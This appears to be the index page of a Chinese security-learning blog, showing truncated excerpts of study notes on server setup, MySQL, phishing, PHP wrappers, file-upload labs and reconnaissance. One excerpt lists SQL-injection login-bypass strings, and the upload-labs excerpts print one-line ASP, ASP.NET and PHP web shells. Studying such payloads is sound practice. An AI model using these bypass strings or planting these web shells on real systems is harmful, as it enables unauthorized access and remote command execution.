YY

There's a lot of potential in the spring.

📕 152词 | 3813字

centos搭建宝塔面板

Centos搭建宝塔面板并安装LNMP环境

安装前准备 服务器放行 8888 端口 内存:512M以上,推荐768M以上(纯面板约占系统60M内存) 硬盘:100M以上可用硬盘空间(纯面板约占20M磁盘空间) 系统:CentOS 7.1+ (Ubuntu16.04+.、Debian9.0+),确保是干净的操作系统,没有安装过其它环境带的Apache/Nginx/php/MySQL(已有环境不可安装) 安装 ...

sql注入万能密码

sql注入万能密码(缓慢补充中)

万能密码 1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or'a'='a 8:"or"="a'='a 9:'or''=' 10:'or'='or' 11:1 or '1'='1'=1 12:1 or '1'='1' or 1=1 13: 'OR 1=1%00

MySql学习笔记

MySQL新手笔记

1、前言 DB:(database,数据库,数据库实际上在硬盘上以文件的形式存在) DBMS(database management system(数据库管理系统)常见的有MySQL、Oracle、DB2等等) SQL:结构化查询语句,便准通用的语言。高级语言,实际上内部先进性编译,在执行sql(sql由DBMS进行编译) PS:DNMS负责执行sql语句,通过sql语句管理DB中的...

钓鱼

学习笔记

在大型企业边界安全做的越来越好的情况下,不管是 APT 攻击还是红蓝对抗演练,钓鱼鱼叉和水坑攻击被越来越多的应用。 钓鱼往往需要免杀技术的支撑,但本章只讲述钓鱼和些许免杀技术,免杀系列学习在后续讲解。 一、钓鱼小技巧 1.1 LNK 快捷方式 lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。 lnk钓鱼主要将...

探索php伪协议

php伪协议

一、php://filter PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。 php:// — 访问各个输入/输出流(I/O streams) php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in...

计算机网络原理

计算机网络笔记

随手记 连通性(彼此连通,交换信息)、共享(信息共享、软硬件共享) 网络(不超过一百米){节点、链路}——–互连网(许多计算机连接) 互联网(网络设备(路由器)连接)internet 因特网:全球最大的互联网 Internet 三个阶段:1969年arpanet;1985三级结构因特网;1993(起源于1993)ISP结构 三层ISP:主干、地区、校园网 p2p:(对等连接方式)...

upload-labs

文件上传

前言 文件上传 各版本的一句话木马 ASP(.asp): <%eval request("cmd")%> ASP.NET(.ASPX): <%@ Page Language="Jscript"%> <%eval(Request.Item["cmd"],"unsafe");%> PHP: <?php @eval($_POST['hack...

upload-labs

文件上传

漏洞概述 文件上传是Web应用的必备功能之一,比如上传头像显示个性化 上传附件共享文件上传脚本更新网站等。如果服务器配置不当或者没有进行足够的过滤,Web用户就可以上传任意文件,包括恶意脚本文件, exe 程序等,这就造成了文件上传漏洞。 各版本一句话木马 ASP(.asp): <%eval request("cmd")%> ASP.NET(.ASPX): <%@ ...

网络攻击和python网络编程

简单讲解网络攻击和python网络编程

洪水攻击 什么是洪水攻击 一、迫使服务器的缓冲区满,不接受新的请求。 二、使用IP欺骗,迫使服务器把合法用户的连接复位,影响合法用户的连接。 洪水攻击的种类 OSI七层模型 DOS攻击 DOS攻击方法 利用软件实现的缺陷 利用协议的漏洞 进行资源比拼 CC攻击 CC攻击类型 代理CC攻击 肉鸡CC攻击 MITM中间人攻击 ...

信息收集

信息收集大致讲解

前言   进行渗透测试之前,最重要的一步就是信息收集。在这个阶段,我们要尽可能地收集目标的信息。所谓“知己知彼,百战不殆”,我们越了解测试目标,测试的工作就越容易。 信息收集的方式可以分为两种:主动和被动。 主动信息收集:通过直接访问、扫描网站,这种流量将流经网站。 被动信息收集:利用第三方的服务对目标进行访问了解,比例:Google搜索、Shodan搜索等。   没有...